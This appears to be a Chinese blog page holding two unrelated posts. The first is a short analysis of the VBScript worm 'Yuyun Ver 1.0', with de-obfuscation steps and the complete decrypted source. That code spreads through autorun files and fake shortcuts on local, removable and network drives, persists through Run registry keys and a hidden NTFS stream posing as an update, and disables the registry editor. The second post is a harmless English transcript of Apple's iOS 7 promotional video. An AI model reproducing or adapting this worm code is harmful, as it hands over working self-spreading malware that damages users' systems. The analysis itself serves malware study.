脚本病毒 Yuyun Ver 1.0 分析

该病毒仿暴风一号的混淆方式,但由于实现方式过于弱智,效果远不如暴风一号。
用支持 Unix 换行符的编辑器打开病毒脚本,查找如下行:

ws.Run "WScript.exe //e:VBScript "+tmpt+" """+Q+""""

删除该行,运行脚本,即可在 %Temp% 目录找到解密后的病毒脚本。

'=======================================================
' My name : Yuyun Ver 1.0
' I just wanna see every girl looks nice, better, kinds especially a moslem girl
' by: Anonymouse in Jatim, November 2008
' When I found nothing beauty else... and then I wrote this script for all
'=======================================================
On Error Resume Next
Dim fso, ws, status,status1, fly
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.Shell")
Set sh = CreateObject("Shell.application")
Set net = CreateObject("wscript.network")
fly=false
tmp=fso.GetSpecialFolder(2)
tn=fso.GetTempName
tmpt=tmp+"\"+tn
docx=ws.SpecialFolders("MyDocuments")

Set swt=WScript.Arguments
If swt.Count>0 Then
	status=swt(0)
End If
if fso.fileexists(tmp+"\Yuyun.Q") then
	set ira=fso.getfile(tmp+"\Yuyun.Q")
	ira.attributes=0
	ira.name="shalihah.ira"
	if ira.name="shalihah.ira" then
	ira.name="Yuyun.Q"
	set ira=fso.opentextfile(tmp+"\Yuyun.Q",2,true)
	else
	fly=true
	end if
else
	set ira=fso.opentextfile(tmp+"\Yuyun.Q",2,true)
end if
Set AQ=fso.GetFile(status)
If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
AQ.Copy tmpt,True
Set AQ=fso.GetFile(tmpt)
AQ.Attributes=39
anv=tmp+"\auto.exe"
If Not fso.FileExists(anv) Then AQ.Copy anv
Set auto=fso.GetFile(anv) 
auto.attributes=0

Set aut=fso.OpenTextFile(anv,2,True,0)
isi="[autorun]>open=WScript.exe //e:VBScript thumb.db auto>shell\open=Open>shell\open\Command=WScript.exe //e:VBScript thumb.db auto>shell\open\Default=1>shell\explore=Explore>shell\explore\Command=WScript.exe //e:VBScript thumb.db auto"
isi=Replace(isi,">",vbCrLf)
aut.Write isi
aut.Close
auto.Attributes=39

ltkc=sh.Namespace(&H1c&).Self.path + "\Microsoft\CD Burning"
AQ.Copy ltkc+"\thumb.db",True
auto.Copy ltkc+"\autorun.inf",True
If fso.FileExists(docx+"\database.mdb") Then fso.GetFile(docx+"\database.mdb").Attributes=0
AQ.Copy docx+"\database.mdb",True
regQ
Set rara=UNISKA
Hertz False
If Day(Now)<>3 Then rekursif docx,1 Else rekursif docx,3

call attack_net
Hertz True

Sub rekursif(path,dp)
On Error Resume Next
dropf path
wscript.sleep 50
If dp>0 Then
For Each fldr1 In fso.GetFolder(path+"\").SubFolders
	rekursif fldr1.Path, dp-1
Next
End If
End Sub

Sub dropf(path)
On Error Resume Next
if day(now)=1 and (month(now)mod 3)=1 then 
rara.copy path+"\Baca AQ.rtf"
rara.copy path+"\My name is Yuyun.rtf"
end if

g1=path+"\autorun.inf"
g2=path+"\Thumb.db"
If fso.FileExists(g1) Then 
	Set g11=fso.GetFile(g1) 
	If g11.Attributes<>39 Then 
		g11.Attributes=0
		auto.Copy path+"\autorun.inf",True
	end if
else 
	auto.Copy path+"\autorun.inf",True
end if


If fso.FileExists(g2) Then 
	Set g12=fso.GetFile(g2)
	If g12.Attributes<>39 Then
		g12.Attributes=0
		AQ.Copy path+"\Thumb.db",True
	end if
else
	AQ.Copy path+"\Thumb.db",True
End If

If Not fso.FileExists(path+"\Microsoft.lnk") Then
shorZvnita path+"\Microsoft","Microsoft"
drop=Array("New Harry Potter and...","New Folder","SuratQ","Rahasia","Game","Zvnita","Download","DataQ","DataQ")
ww=1
For Each d In drop
	If Day(now) Mod 3 = ww Then shorZvnita path+"\"+d,d
	wscript.sleep 60
	ww=ww+1
Next
r=0
For Each fldr In fso.GetFolder(path+"\").SubFolders
	shorZvnita path+"\"+fldr.name,fldr.Name
	wscript.sleep 60
If r>3 Then 
	Exit For
End if
r=r+1
Next
End If
End Sub

Sub shorZvnita(path,trgt)
Set shor=ws.CreateShortcut(path+".lnk")
shor.iconlocation="shell32.dll,3"
shor.targetpath="wscript.exe"
shor.arguments="//e:VBScript thumb.db """+trgt+""""
shor.save
End Sub

function attack_net()
	On Error Resume Next
	err.clear
	Set objFolder = sh.Namespace(&H13&)
	Set colItems = objFolder.Items
	For Each strFileName in objFolder.Items
	t= objFolder.GetDetailsOf(strFileName, 14)
	if fso.folderexists(t) then
		rekursif t,4
	end if
	Next
End function

Sub tdr()
On Error Resume Next
err.clear
WScript.Sleep 180000
if err.number>0 then wscript.quit
End Sub

function UNISKA()
On error resume next
x=vbcrlf
adv="Yuyun Ver 1.0 ^_^!==================>>Bukan dari tulang ubun ia dicipta>karna berbahaya membiarkannya dalam sanjung dan puja>tak juga dari tulang kaki>karna nista membuatnya diinjak dan diperbudak>tapi dari tulang rusuk bagian kiri>dekat ke hati untuk disayangi>dekat ke tangan untuk dilindungi>>(dikutip dr: Agar Bidadari Cemburu Padamu)>>>""Janganlah kamu bersikap lemah, dan janganlah (pula) kamu bersedih hati, padahal kamulah>orang-orang yang paling tinggi (derajatnya), jika kamu orang-orang yang beriman."">(QS. Ali Imran:139)>>>Katakanlah kepada orang laki-laki yang beriman: ""Hendaklah mereka menahan pandanganya, >dan memelihara kemaluannya; yang demikian itu adalah lebih suci bagi mereka, >sesungguhnya Allah Maha Mengetahui apa yang mereka perbuat."" (QS. An Nur:30)>>Katakanlah kepada wanita yang beriman: ""Hendaklah mereka menahan pandangannya, >dan kemaluannya, dan janganlah mereka menampakkan perhiasannya, kecuali yang >(biasa) nampak dari padanya. Dan hendaklah mereka menutupkan kain kudung >kedadanya...."" (QS. An Nur:30)>>Sorry I just Nitip Print thok....Ndak pa2 khan^_^!  www.muslimah.or.id >>Hai anak Adam, sesungguhnya Kami telah menurunkan kepadamu >pakaian untuk menutup auratmu dan pakaian indah untuk perhiasan.>Dan pakaian takwa itulah yang paling baik. Yang demikian itu adalah >sebahagian dari tanda-tanda kekuasaan Allah, mudah-mudahan mereka selalu ingat.(Al-A'raf:26)"

adv=replace(adv,">",x)
set Yu2n=fso.opentextfile(tmp+"\v.doc",2,true)
Yu2n.write adv
Yu2n.close
if day(now)=1 and (month(now)mod 3)=1 then 
if fly=false then
for i=1 to 3
ws.run "notepad.exe /p """+tmp+"\v.doc"""
next
end if
end if
set UNISKA=fso.getfile(tmp+"\v.doc")
end function

Sub regQ()
On Error Resume Next
if day(now)=1 then
ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\", "Yuyun_Cantix"
ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\DefaultIcon\","shell32.dll,48"
ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\ShellFolder\Attributes",0,"REG_DWORD"
ws.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11111111-2222-3333-4444-555555555555}\",""
end if
ws.regdelete "HKCR\lnkfile\IsShortcut"
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Explorer","Wscript.exe //e:VBScript """+docx+"\database.mdb"""
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools",1,"REG_DWORD"
if lcase(fso.getdrive("c:").FileSystem)="ntfs" then
iraQ=AQ.openastextstream(1,0).read(AQ.size)
www=fso.GetSpecialFolder(0)
set jjk=fso.opentextfile(www+"\:Microsoft Office Update for Windows XP.sys",2,true)
jjk.write iraQ
jjk.close
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate","Wscript.exe //e:VBScript """+www+"\:Microsoft Office Update for Windows XP.sys"""
end if
End Sub

Sub Hertz(ooo)
On Error Resume Next
do
For Each drv In fso.Drives
If drv.DriveType=1 Then
rekursif drv.Path,4
Else
rekursif drv.Path,2
End if
Next
if fly=false then 
tdr
else 
wscript.quit
end if
regQ
If ooo=False Then 
Exit Do
End If
loop
End Sub

iOS 7 视频听写

原始视频:http://movies.apple.com/media/us/ios/2013/610b67-cd9a-e384-10j58600a9/tour/feature/ios7-feature-us-20130610_848x480.mp4

We have always thought of design as being so much more than just the way something looks.

It’s the whole thing the way something actually works on so many different levels.

Ultimately of course, design defines so much of our experience.

I think there is a profound and enduring beauty in simplicity, in clarity, in efficiency.

True simplicity is derived from so much more than just the absence of clutter and ornamentation. It’s about bringing order to complexity.

iOS 7 is a clear representation of these goals. It has a whole new structure that is coherent and is applied across the entire system.

We’ve considered the tiniest details, like refining the typography, to much larger ones, like redesigning all the icons.

And developing a grid system, allowed us to achieve a much more harmonious relationship between individual elements.

We’ve also incorporated a whole new palette of colors.

Distinct, functional layers helped us establish hierarchy and order.

And the use of translucency, gives you a sense of your context.

These planes, combined with new approaches to animation and motion create a sense of depth and vitality.

The iPhone responding to your movements, drives the parallax, to create a whole new experience of depth.

In many ways, we’re trying to create an interface that is unobtrusive and differential.

One where the design recedes, and in doing so, actually elevate your content.

Even the simple act of changing your wallpaper has a very noticeable effect on the way your iPhone looks and feels across the entire system.

While iOS 7 is completely new, it was important to us to make it instantly familiar. We wanted to take in experiences that people know very well and actually add to it, to make it more useful, to make it more enjoyable.

 

In addition to the redesigned user interface, iOS 7 comes with some great new features and enhancements.

Now, the controls you want to access quickly are all in one convenient place with control center.

One swipe from any screen opens up a set of useful controls.

And Notification center is now available from the lock screen, with the new at-a-glance view of your day.

Multitasking let you jump from app to app much more intuitively.

It actually pays attention to which app you use the most, and automatically keeps your content up to date in the background.

The new camera app introduces a new level of ease and versatility. Now you can just swipe between modes, from video to still to square, while using a new plate of filters.

Your iPhone know the time and location for each of your photos. The photos app uses this information to intelligently organize your pictures by clustering them in the moments and collections.

And now with iCloud photo sharing, friends and family can contribute their own photos and videos to your shared albums.

With over 800, 000 apps, the app store is the world’s largest app marketplace. iOS 7 now features popular near me, a new way to find curated collection of apps based on your current location.

AirDrop makes it easy to share with people near you. When you got something you want to share, AirDrop shows your contacts close by. Just select who you want to share with, and AirDrop does the rest.

And if someone is not in your contacts, they just activate their AirDrop, and you can send them files too.

Safari’s redesigned user interface let you see more of your content starting with full screen browsing.

The unified search field helps simplify searching, and there is a new view of your bookmarks.

And also a new way to see your Safari tabs.

Siri is now even more helpful and informative, with integrated Twitter and Wikipedia.

And with New male and female voices, Siri sounds better than ever.

And, Siri can assist you in new ways, by doing things like changing the settings on your iOS device.

iTunes radio is a great way to discover new music.

We created many featured stations, drawing from best selection of songs online.

It’s easy for you to create your own stations.

And when you hear something you want to purchase, it’s just a tap away.

 

iOS 7 brings with it the most significant changes that we’ve made to the user interface since the introduction of the very first iOS.

To create it, we brought together a board range of expertise from design to engineering.

With what we’ve being able to achieve together, we see iOS 7 as defining an important new direction, and in many ways, a beginning.